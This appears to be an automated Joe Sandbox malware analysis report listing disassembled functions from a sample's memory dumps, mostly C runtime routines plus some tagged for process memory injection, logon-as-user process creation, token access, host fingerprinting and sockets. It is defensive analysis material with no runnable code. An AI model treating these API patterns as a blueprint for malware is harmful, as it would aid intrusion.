_errno.LIBCMT ref: 03A88615

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__lock_fhandle.LIBCMT ref: 03A8865D
FlushFileBuffers.KERNEL32 ref: 03A88678
GetLastError.KERNEL32 ref: 03A88682
__doserrno.LIBCMT ref: 03A88692
_errno.LIBCMT ref: 03A88699

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2289611984-0
Opcode ID: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
Instruction ID: 81d2f21f6a6ade49a4bce77b4c405091cb7277f01a4e428f8611c82d5a1e98ab
Opcode Fuzzy Hash: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
Instruction Fuzzy Hash: C211D33270074449D706FF659DA432E7A6DAB81760F89163BCA254B3A0CFBCC8818715

Uniqueness

Uniqueness Score: -1.00%

Function 03A83B18 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A83B39

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A83B31

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

__lock_fhandle.LIBCMT ref: 03A83B7D
_close_nolock.LIBCMT ref: 03A83B90

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
Instruction ID: 87e48840619b6d4c7ad11a37898b6a68049eb6c42cd6c497eb6ad26365019d2a
Opcode Fuzzy Hash: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
Instruction Fuzzy Hash: A811E7BE60078449DB15FF79EE9832D7A21A7C0B61F591A2BC9194F3D0CBB8C4418314

Uniqueness

Uniqueness Score: -1.00%

Function 03663A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03663AF0

Part of subcall function 0367C60F: _FF_MSGBANNER.LIBCMT ref: 0367C63F
Part of subcall function 0367C60F: _NMSG_WRITE.LIBCMT ref: 0367C649
Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C67D
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C688
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C693

malloc.LIBCMT ref: 03663AFA

Part of subcall function 0367C60F: _callnewh.LIBCMT ref: 0367C6A3
Part of subcall function 0367C60F: _errno.LIBCMT ref: 0367C6A8

malloc.LIBCMT ref: 03663B05
free.LIBCMT ref: 03663CC5
free.LIBCMT ref: 03663CCD
free.LIBCMT ref: 03663CD5

Part of subcall function 03664937: malloc.LIBCMT ref: 03664981
Part of subcall function 03664937: malloc.LIBCMT ref: 0366498C
Part of subcall function 03664937: free.LIBCMT ref: 03664A73
Part of subcall function 03664937: free.LIBCMT ref: 03664A7B

free.LIBCMT ref: 03663CE1
free.LIBCMT ref: 03663CEE
free.LIBCMT ref: 03663CFB

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction ID: dbf13d3c49eecc33811aacae8ed1caeac6b58ed83c1f6e3663ecd59ef9fc01fd
Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction Fuzzy Hash: 2681E638718B4D4BC729EF6C985177A77D5FB85680F64026ED48BC7362EE24D803878A

Uniqueness

Uniqueness Score: -1.00%

Function 03A6460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A646A9

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

malloc.LIBCMT ref: 03A646B3

Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D25C
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D261

malloc.LIBCMT ref: 03A646BE
free.LIBCMT ref: 03A6487E
free.LIBCMT ref: 03A64886
free.LIBCMT ref: 03A6488E

Part of subcall function 03A654F0: malloc.LIBCMT ref: 03A6553A
Part of subcall function 03A654F0: malloc.LIBCMT ref: 03A65545
Part of subcall function 03A654F0: free.LIBCMT ref: 03A6562C
Part of subcall function 03A654F0: free.LIBCMT ref: 03A65634

free.LIBCMT ref: 03A6489A
free.LIBCMT ref: 03A648A7
free.LIBCMT ref: 03A648B4

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
Instruction ID: 50d1d7c6f94813b6cb2d40938fb69ebabca1ee11576442c30ab1738d97df5bde
Opcode Fuzzy Hash: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
Instruction Fuzzy Hash: AD6103667047C586DB25EF67989076EBB55FB8AFC8F48512ACE4A5BB04DF38C406CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00472C00 Relevance: 10.9, APIs: 3, Strings: 4, Instructions: 353COMMON

Download Yara Rule

Strings

basic_filebuf::underflow incomplete character in file, xrefs: 00473181
basic_filebuf::underflow codecvt::max_length() is not valid, xrefs: 0047313C
basic_filebuf::underflow invalid byte sequence in file, xrefs: 00473130
basic_filebuf::underflow error reading the file, xrefs: 0047306C

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _fstat64
String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
API String ID: 4167846806-2144588626
Opcode ID: 1a09f21f9b908ac25625f2e9e05ef5d86e843e120d3c786a2b7fc3fce09769fd
Instruction ID: f74ed9edcc25e233fcc26816288bd44ab4c0d313526575f455f1cad6c8ef24ce
Opcode Fuzzy Hash: 1a09f21f9b908ac25625f2e9e05ef5d86e843e120d3c786a2b7fc3fce09769fd
Instruction Fuzzy Hash: 00D17932201B8485DB508F36E5403AA37A4F705F9CF58823ACE9D1B798EF78C99AD355

Uniqueness

Uniqueness Score: -1.00%

Function 00475190 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 346COMMON

Download Yara Rule

Strings

basic_filebuf::underflow incomplete character in file, xrefs: 00475708
basic_filebuf::underflow codecvt::max_length() is not valid, xrefs: 004756BF
basic_filebuf::underflow invalid byte sequence in file, xrefs: 00475680
basic_filebuf::underflow error reading the file, xrefs: 00475617

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _fstat64
String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
API String ID: 4167846806-2144588626
Opcode ID: a36fae291d1fe97aede1f4c4e98b3d2c4152a983a5ab098d7e6c5ac2c778028a
Instruction ID: c43f3cec49d2a2c92172dac8e99acee29390ea69bf6342e345b5fdb274fb5cf2
Opcode Fuzzy Hash: a36fae291d1fe97aede1f4c4e98b3d2c4152a983a5ab098d7e6c5ac2c778028a
Instruction Fuzzy Hash: 69D13932201F8485DB509F26D4443AA37A5F745F9CF98813ACE4D1B758EFB8C89AC395

Uniqueness

Uniqueness Score: -1.00%

Function 03A79A44 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

malloc.LIBCMT ref: 03A79AF0

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

Part of subcall function 03A7CA38: malloc.LIBCMT ref: 03A7CA88

GetComputerNameExA.KERNEL32 ref: 03A79BB2
GetComputerNameA.KERNEL32 ref: 03A79BE7
GetUserNameA.ADVAPI32 ref: 03A79C1C

Part of subcall function 03A6EC4C: WSASocketA.WS2_32 ref: 03A6EC7A

malloc.LIBCMT ref: 03A79D35

Strings

VUUU, xrefs: 03A79C78

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
String ID: VUUU
API String ID: 632458648-2040033107
Opcode ID: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
Instruction ID: 82f90bf8e96837a9d5b52566b8a1aa34a272256a070aed8abdb8d74fb0bbcd01
Opcode Fuzzy Hash: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
Instruction Fuzzy Hash: 2091F32AB0079186DB15EB76DDD07EE67A6BBC9B84F84402BCD895F758DF38C5458300

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBD0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 239stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041DBF9
memcmp.MSVCRT ref: 0041DC38

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0041DC6A, 0041DD16, 0041DDB6, 0041DE83, 0041DE8F
basic_string::compare, xrefs: 0041DC77, 0041DD23, 0041DDC3, 0041DE76, 0041DE9C

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcmpstrlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3108337309-1697194757
Opcode ID: e3b6f1a0031612999767b9f9d4819d567ad3435b50cd72b1eca3a84eabfbb9c7
Instruction ID: b376e13bd721197d004ef16696080fdec67468bda87134cf72a7e28007dadae0
Opcode Fuzzy Hash: e3b6f1a0031612999767b9f9d4819d567ad3435b50cd72b1eca3a84eabfbb9c7
Instruction Fuzzy Hash: 715115E3F4169481EE11AA2AFD503E512009B59FE4F4D4636DF2C5B7D5EA2CCAC6C308

Uniqueness

Uniqueness Score: -1.00%

Function 00427A30 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 238stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00427A59
memcmp.MSVCRT ref: 00427A9A

Strings

basic_string::compare, xrefs: 00427AD7, 00427B73, 00427C03, 00427CA6, 00427CCC
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00427ACA, 00427B66, 00427BF6, 00427CB3, 00427CBF

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcmpstrlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3108337309-1697194757
Opcode ID: a41473b02c9855e1ba0579115c8983a62b5d325fbfd2cf10ff9ccaf1353a5d8d
Instruction ID: 87de52c1322c8bd67267b5068712183516038140e2cf5e26ab991b88e271b7df
Opcode Fuzzy Hash: a41473b02c9855e1ba0579115c8983a62b5d325fbfd2cf10ff9ccaf1353a5d8d
Instruction Fuzzy Hash: 7D512AA3B4569481DE11AB2BFD113D556409759BF4FCC8636EE2C4B7D1E92CCAC6C308

Uniqueness

Uniqueness Score: -1.00%

Function 0040F010 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0040F021
_fileno.MSVCRT ref: 0040F02F
_errno.MSVCRT ref: 0040F263

Strings

, xrefs: 0040F204

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _errno$_fileno
String ID:
API String ID: 1786942999-3916222277
Opcode ID: 0f09cc2b22694fe3c4dc095f6f24681afe0c050607e8f1838fb702387678548d
Instruction ID: b26e05bdd7f6d9608cb0cf7068ad020e69eebe58a1822205de0d991cf01f1533
Opcode Fuzzy Hash: 0f09cc2b22694fe3c4dc095f6f24681afe0c050607e8f1838fb702387678548d
Instruction Fuzzy Hash: D151067370165481EB358F26D94076A6B51A745FECF49823BCE191BFD5EA3CC88AC308

Uniqueness

Uniqueness Score: -1.00%

Function 03A70770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON

Download Yara Rule

APIs

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

GetStartupInfoA.KERNEL32 ref: 03A70838

Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAAD
Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAD5

GetCurrentDirectoryW.KERNEL32 ref: 03A708C5
GetCurrentDirectoryW.KERNEL32 ref: 03A708D4
CreateProcessWithLogonW.ADVAPI32 ref: 03A7092F
GetLastError.KERNEL32 ref: 03A70939

Strings

%s as %s\%s: %d, xrefs: 03A7093F

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
Instruction ID: 2c8bd4dde53af242a4d8e12e1b727e4ede0992c275acbf0b471dc0fc55d622a3
Opcode Fuzzy Hash: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
Instruction Fuzzy Hash: 15513736705B8186DB60DF66F98075AB7A9F789BC0F14412ADF8997B28DF38C0558B40

Uniqueness

Uniqueness Score: -1.00%

Function 03A70344 Relevance: 10.6, APIs: 7, Instructions: 109injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A7775C: GetCurrentProcess.KERNEL32 ref: 03A77774

GetLastError.KERNEL32 ref: 03A703B3
ReadProcessMemory.KERNEL32 ref: 03A703E4
ReadProcessMemory.KERNEL32 ref: 03A7040C
malloc.LIBCMT ref: 03A7044A
free.LIBCMT ref: 03A70493
WriteProcessMemory.KERNEL32 ref: 03A704BA
GetLastError.KERNEL32 ref: 03A704C4

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Process$Memory$ErrorLastRead$CurrentWritefreemalloc
String ID:
API String ID: 2416742903-0
Opcode ID: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
Instruction ID: 29998ae461191c6e874ad082226513c480d5c0aee0e3c08d0f3a44816215a66a
Opcode Fuzzy Hash: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
Instruction Fuzzy Hash: A3418F76314B5186DB64DB26ED8076FA365FB84BC9F00552AAF8A87B58EF3CC1448B00

Uniqueness

Uniqueness Score: -1.00%

Function 0367D197 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0367D1BD

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_invalid_parameter_noinfo.LIBCMT ref: 0367D1C9
__crtIsPackagedApp.LIBCMT ref: 0367D1DA
_dosmaperr.LIBCMT ref: 0367D224

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction ID: 0de688746e5c1a74ada0deb10553953e9dd990372cb4dfa934c10f1aa7f60025
Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction Fuzzy Hash: 8E310430714B098FEB58EF7C985476976D1FF88324F584AADA45AC73A0EB38C8428746

Uniqueness

Uniqueness Score: -1.00%

Function 03687A43 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03687A5C

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__lock_fhandle.LIBCMT ref: 03687AA4
__doserrno.LIBCMT ref: 03687AD9
_errno.LIBCMT ref: 03687AE0
_unlock_fhandle.LIBCMT ref: 03687AF0

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction ID: 9bd2a4f01f1f74441498901b2553a8c1c09411a9b09eea353ab2f0f285560d6d
Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction Fuzzy Hash: C0210531A087054EE325FFAC98D026E7A90EB49214F69076CD41ACF391DBF95941C799

Uniqueness

Uniqueness Score: -1.00%

Function 03A7C92C Relevance: 10.6, APIs: 7, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03A7C967
OpenProcessToken.ADVAPI32 ref: 03A7C98B
GetLastError.KERNEL32 ref: 03A7C995

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ErrorLast$OpenProcessToken
String ID:
API String ID: 2009710997-0
Opcode ID: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
Instruction ID: ae89dc6c2ecbb51c6a079b3db876c88bb2362bb54bbeb1cb0234468515839c03
Opcode Fuzzy Hash: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
Instruction Fuzzy Hash: 0621C12670470087EB55EB76E89071BA7A5BBC9BE4F04403A9E8A87B64EE38C546C741

Uniqueness

Uniqueness Score: -1.00%

Function 03A8DA90 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03A8DAC4

Part of subcall function 03A7F454: _getptd.LIBCMT ref: 03A7F46A
Part of subcall function 03A7F454: __updatetlocinfo.LIBCMT ref: 03A7F49F
Part of subcall function 03A7F454: __updatetmbcinfo.LIBCMT ref: 03A7F4C6

_errno.LIBCMT ref: 03A8DADF
_invalid_parameter_noinfo.LIBCMT ref: 03A8DAEA

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction ID: 4ee3c848fe932cac0bc43bfc72a0863b06717ade28ddd8b3cf3c9e1a0255b592
Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction Fuzzy Hash: 85217FB63047848ADB11EF16D58865ABBA4F794FE0F594127EE5847B94CB74C941C700

Uniqueness

Uniqueness Score: -1.00%

Function 03A740BC Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A740CD
ioctlsocket.WS2_32 ref: 03A740EE
GetTickCount.KERNEL32 ref: 03A74133
ioctlsocket.WS2_32 ref: 03A74155

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

